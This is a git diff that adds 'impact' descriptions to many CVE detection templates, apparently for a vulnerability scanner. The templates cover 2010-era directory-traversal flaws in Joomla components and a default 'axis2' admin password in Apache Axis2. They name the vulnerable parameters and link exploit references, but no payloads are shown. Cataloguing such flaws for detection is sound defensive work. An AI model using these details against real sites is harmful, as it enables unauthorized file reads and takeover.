code execution. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/10943 diff --git a/http/cves/2010/CVE-2010-0219.yaml b/http/cves/2010/CVE-2010-0219.yaml index a264be8142..f21b5e1318 100644 --- a/http/cves/2010/CVE-2010-0219.yaml +++ b/http/cves/2010/CVE-2010-0219.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or the ability to modify or delete data. remediation: | Disable or restrict access to the Axis2 web interface, or apply the necessary patches or updates provided by the vendor. reference: diff --git a/http/cves/2010/CVE-2010-0467.yaml b/http/cves/2010/CVE-2010-0467.yaml index d9c63a2666..df5713439a 100644 --- a/http/cves/2010/CVE-2010-0467.yaml +++ b/http/cves/2010/CVE-2010-0467.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. remediation: Apply all relevant security patches and upgrades. reference: - https://www.exploit-db.com/exploits/11282 diff --git a/http/cves/2010/CVE-2010-0696.yaml b/http/cves/2010/CVE-2010-0696.yaml index d56a13d928..bf8d28d1a5 100644 --- a/http/cves/2010/CVE-2010-0696.yaml +++ b/http/cves/2010/CVE-2010-0696.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter. + impact: | + An attacker can exploit this vulnerability to retrieve arbitrary files from the server. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11447 diff --git a/http/cves/2010/CVE-2010-0759.yaml b/http/cves/2010/CVE-2010-0759.yaml index 356f8f51cb..139c84a86e 100644 --- a/http/cves/2010/CVE-2010-0759.yaml +++ b/http/cves/2010/CVE-2010-0759.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access or information disclosure. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11498 diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml index 14f7b665fa..e7ff74d1e4 100644 --- a/http/cves/2010/CVE-2010-0942.yaml +++ b/http/cves/2010/CVE-2010-0942.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11089 diff --git a/http/cves/2010/CVE-2010-0943.yaml b/http/cves/2010/CVE-2010-0943.yaml index 2cfac5a06e..d6d5a4d6b8 100644 --- a/http/cves/2010/CVE-2010-0943.yaml +++ b/http/cves/2010/CVE-2010-0943.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server. remediation: | Update to the latest version of Joomla! Component com_jashowcase to fix the directory traversal vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-0944.yaml b/http/cves/2010/CVE-2010-0944.yaml index fd05da7897..81174f71a7 100644 --- a/http/cves/2010/CVE-2010-0944.yaml +++ b/http/cves/2010/CVE-2010-0944.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11088 diff --git a/http/cves/2010/CVE-2010-0972.yaml b/http/cves/2010/CVE-2010-0972.yaml index 1f7566b1a3..cf2b104c42 100644 --- a/http/cves/2010/CVE-2010-0972.yaml +++ b/http/cves/2010/CVE-2010-0972.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access or information disclosure. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11738 diff --git a/http/cves/2010/CVE-2010-0982.yaml b/http/cves/2010/CVE-2010-0982.yaml index 95e78bfedb..6aaf353b6f 100644 --- a/http/cves/2010/CVE-2010-0982.yaml +++ b/http/cves/2010/CVE-2010-0982.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Allows an attacker to read arbitrary files on the server, leading to potential information disclosure and further exploitation. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/10942 diff --git a/http/cves/2010/CVE-2010-0985.yaml b/http/cves/2010/CVE-2010-0985.yaml index 876879408c..c16c6ef38c 100644 --- a/http/cves/2010/CVE-2010-0985.yaml +++ b/http/cves/2010/CVE-2010-0985.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/10948 diff --git a/http/cves/2010/CVE-2010-1056.yaml b/http/cves/2010/CVE-2010-1056.yaml index c18d4f94b9..8f0f782af8 100644 --- a/http/cves/2010/CVE-2010-1056.yaml +++ b/http/cves/2010/CVE-2010-1056.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11760 diff --git a/http/cves/2010/CVE-2010-1081.yaml b/http/cves/2010/CVE-2010-1081.yaml index 4a6961094a..381ed74c14 100644 --- a/http/cves/2010/CVE-2010-1081.yaml +++ b/http/cves/2010/CVE-2010-1081.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11511 diff --git a/http/cves/2010/CVE-2010-1217.yaml b/http/cves/2010/CVE-2010-1217.yaml index 74078c9f09..51e67a76e9 100644 --- a/http/cves/2010/CVE-2010-1217.yaml +++ b/http/cves/2010/CVE-2010-1217.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11814 diff --git a/http/cves/2010/CVE-2010-1219.yaml b/http/cves/2010/CVE-2010-1219.yaml index d199908f5f..4a7117d194 100644 --- a/http/cves/2010/CVE-2010-1219.yaml +++ b/http/cves/2010/CVE-2010-1219.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11757 diff --git a/http/cves/2010/CVE-2010-1302.yaml b/http/cves/2010/CVE-2010-1302.yaml index f87a80beed..a2e627f573 100644 --- a/http/cves/2010/CVE-2010-1302.yaml +++ b/http/cves/2010/CVE-2010-1302.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access or information disclosure. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11978 diff --git a/http/cves/2010/CVE-2010-1305.yaml b/http/cves/2010/CVE-2010-1305.yaml index 684a1965c8..9ab18129de 100644 --- a/http/cves/2010/CVE-2010-1305.yaml +++ b/http/cves/2010/CVE-2010-1305.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12065 diff --git a/http/cves/2010/CVE-2010-1306.yaml b/http/cves/2010/CVE-2010-1306.yaml index eb484f39f1..faaf60f701 100644 --- a/http/cves/2010/CVE-2010-1306.yaml +++ b/http/cves/2010/CVE-2010-1306.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12058 diff --git a/http/cves/2010/CVE-2010-1307.yaml b/http/cves/2010/CVE-2010-1307.yaml index 746c9ae464..037258eb10 100644 --- a/http/cves/2010/CVE-2010-1307.yaml +++ b/http/cves/2010/CVE-2010-1307.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12070 diff --git a/http/cves/2010/CVE-2010-1308.yaml b/http/cves/2010/CVE-2010-1308.yaml index 4dcd078cc5..1f04e0156f 100644 --- a/http/cves/2010/CVE-2010-1308.yaml +++ b/http/cves/2010/CVE-2010-1308.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12066 diff --git a/http/cves/2010/CVE-2010-1312.yaml b/http/cves/2010/CVE-2010-1312.yaml index 75dabb124e..2c7dd866b7 100644 --- a/http/cves/2010/CVE-2010-1312.yaml +++ b/http/cves/2010/CVE-2010-1312.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12077 diff --git a/http/cves/2010/CVE-2010-1313.yaml b/http/cves/2010/CVE-2010-1313.yaml index c1b8c445b8..63c45ad01b 100644 --- a/http/cves/2010/CVE-2010-1313.yaml +++ b/http/cves/2010/CVE-2010-1313.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the Joomla! CMS. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12082 diff --git a/http/cves/2010/CVE-2010-1314.yaml b/http/cves/2010/CVE-2010-1314.yaml index 463dc69efc..15be0d45a4 100644 --- a/http/cves/2010/CVE-2010-1314.yaml +++ b/http/cves/2010/CVE-2010-1314.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12086 diff --git a/http/cves/2010/CVE-2010-1315.yaml b/http/cves/2010/CVE-2010-1315.yaml index 6afc40fd4a..e6f371b4ae 100644 --- a/http/cves/2010/CVE-2010-1315.yaml +++ b/http/cves/2010/CVE-2010-1315.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11999 diff --git a/http/cves/2010/CVE-2010-1340.yaml b/http/cves/2010/CVE-2010-1340.yaml index 1454f31ec2..7efd72eb90 100644 --- a/http/cves/2010/CVE-2010-1340.yaml +++ b/http/cves/2010/CVE-2010-1340.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + The vulnerability allows an attacker to include arbitrary local files, leading to remote code execution or sensitive information disclosure. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/33797 diff --git a/http/cves/2010/CVE-2010-1345.yaml b/http/cves/2010/CVE-2010-1345.yaml index d8967d0bab..5a785fd24a 100644 --- a/http/cves/2010/CVE-2010-1345.yaml +++ b/http/cves/2010/CVE-2010-1345.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/15453 diff --git a/http/cves/2010/CVE-2010-1352.yaml b/http/cves/2010/CVE-2010-1352.yaml index 96840d095a..54ed4d6dc7 100644 --- a/http/cves/2010/CVE-2010-1352.yaml +++ b/http/cves/2010/CVE-2010-1352.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12084 diff --git a/http/cves/2010/CVE-2010-1353.yaml b/http/cves/2010/CVE-2010-1353.yaml index f3daabf11c..c0ddd4da3a 100644 --- a/http/cves/2010/CVE-2010-1353.yaml +++ b/http/cves/2010/CVE-2010-1353.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: | Apply the latest security patches or updates provided by Joomla! to fix the LFI vulnerability in LoginBox component. reference: diff --git a/http/cves/2010/CVE-2010-1354.yaml b/http/cves/2010/CVE-2010-1354.yaml index bdf5759e4b..ffc2c0e178 100644 --- a/http/cves/2010/CVE-2010-1354.yaml +++ b/http/cves/2010/CVE-2010-1354.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12102 diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml index 0f6913faae..e5daba6f03 100644 --- a/http/cves/2010/CVE-2010-1429.yaml +++ b/http/cves/2010/CVE-2010-1429.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Red Hat JBoss Enterprise Application Platform 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 is susceptible to sensitive information disclosure. A remote attacker can obtain sensitive information about "deployed web contexts" via a request to the status servlet, as demonstrated by a full=true query string. NOTE: this issue exists because of a CVE-2008-3273 regression. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks. remediation: | Apply the necessary patches or updates provided by Red Hat to fix the vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-1461.yaml b/http/cves/2010/CVE-2010-1461.yaml index 5d6536e4eb..04bfedb69c 100644 --- a/http/cves/2010/CVE-2010-1461.yaml +++ b/http/cves/2010/CVE-2010-1461.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php. + impact: | + The LFI vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the Joomla! application. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12232 diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml index d1db2b2453..4bd6599f1e 100644 --- a/http/cves/2010/CVE-2010-1469.yaml +++ b/http/cves/2010/CVE-2010-1469.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12146 diff --git a/http/cves/2010/CVE-2010-1470.yaml b/http/cves/2010/CVE-2010-1470.yaml index 6771437e12..aef4752393 100644 --- a/http/cves/2010/CVE-2010-1470.yaml +++ b/http/cves/2010/CVE-2010-1470.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12166 diff --git a/http/cves/2010/CVE-2010-1471.yaml b/http/cves/2010/CVE-2010-1471.yaml index 6691ff24e5..be7d6bab50 100644 --- a/http/cves/2010/CVE-2010-1471.yaml +++ b/http/cves/2010/CVE-2010-1471.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: | Update to the latest version of Joomla! Component Address Book or apply the necessary patches to fix the LFI vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-1472.yaml b/http/cves/2010/CVE-2010-1472.yaml index a6fcf585b5..29bcc494fe 100644 --- a/http/cves/2010/CVE-2010-1472.yaml +++ b/http/cves/2010/CVE-2010-1472.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potentially execute arbitrary code. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12167 diff --git a/http/cves/2010/CVE-2010-1473.yaml b/http/cves/2010/CVE-2010-1473.yaml index ef4a2ff52b..5e742be772 100644 --- a/http/cves/2010/CVE-2010-1473.yaml +++ b/http/cves/2010/CVE-2010-1473.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12171 diff --git a/http/cves/2010/CVE-2010-1474.yaml b/http/cves/2010/CVE-2010-1474.yaml index fa9ce49ac6..3a71203079 100644 --- a/http/cves/2010/CVE-2010-1474.yaml +++ b/http/cves/2010/CVE-2010-1474.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: | Update to the latest version of Joomla! Component Sweetykeeper or apply the necessary patches to fix the LFI vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-1475.yaml b/http/cves/2010/CVE-2010-1475.yaml index 1d1f90edfb..f67daff417 100644 --- a/http/cves/2010/CVE-2010-1475.yaml +++ b/http/cves/2010/CVE-2010-1475.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + The LFI vulnerability can allow an attacker to read arbitrary files on the server, potentially exposing sensitive information or executing malicious code. remediation: | Update to the latest version of Joomla! Component Preventive And Reservation and apply any available patches or fixes to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-1476.yaml b/http/cves/2010/CVE-2010-1476.yaml index 630b46689f..ff2700ea51 100644 --- a/http/cves/2010/CVE-2010-1476.yaml +++ b/http/cves/2010/CVE-2010-1476.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12150 diff --git a/http/cves/2010/CVE-2010-1478.yaml b/http/cves/2010/CVE-2010-1478.yaml index 8e0ff4a512..14b5f48fd7 100644 --- a/http/cves/2010/CVE-2010-1478.yaml +++ b/http/cves/2010/CVE-2010-1478.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12145 diff --git a/http/cves/2010/CVE-2010-1491.yaml b/http/cves/2010/CVE-2010-1491.yaml index 54f60dd657..d6c6761977 100644 --- a/http/cves/2010/CVE-2010-1491.yaml +++ b/http/cves/2010/CVE-2010-1491.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + The LFI vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the Joomla! CMS. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12318 diff --git a/http/cves/2010/CVE-2010-1494.yaml b/http/cves/2010/CVE-2010-1494.yaml index 8a9fadb58a..904a894a02 100644 --- a/http/cves/2010/CVE-2010-1494.yaml +++ b/http/cves/2010/CVE-2010-1494.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12113 diff --git a/http/cves/2010/CVE-2010-1495.yaml b/http/cves/2010/CVE-2010-1495.yaml index 66337f19c8..6ad6acd9de 100644 --- a/http/cves/2010/CVE-2010-1495.yaml +++ b/http/cves/2010/CVE-2010-1495.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12286 diff --git a/http/cves/2010/CVE-2010-1531.yaml b/http/cves/2010/CVE-2010-1531.yaml index a6de5422e5..8e5aefd87f 100644 --- a/http/cves/2010/CVE-2010-1531.yaml +++ b/http/cves/2010/CVE-2010-1531.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12054 diff --git a/http/cves/2010/CVE-2010-1532.yaml b/http/cves/2010/CVE-2010-1532.yaml index 2c091c5017..b993856111 100644 --- a/http/cves/2010/CVE-2010-1532.yaml +++ b/http/cves/2010/CVE-2010-1532.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12118 diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml index ec75c49e54..ddabeea490 100644 --- a/http/cves/2010/CVE-2010-1533.yaml +++ b/http/cves/2010/CVE-2010-1533.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote 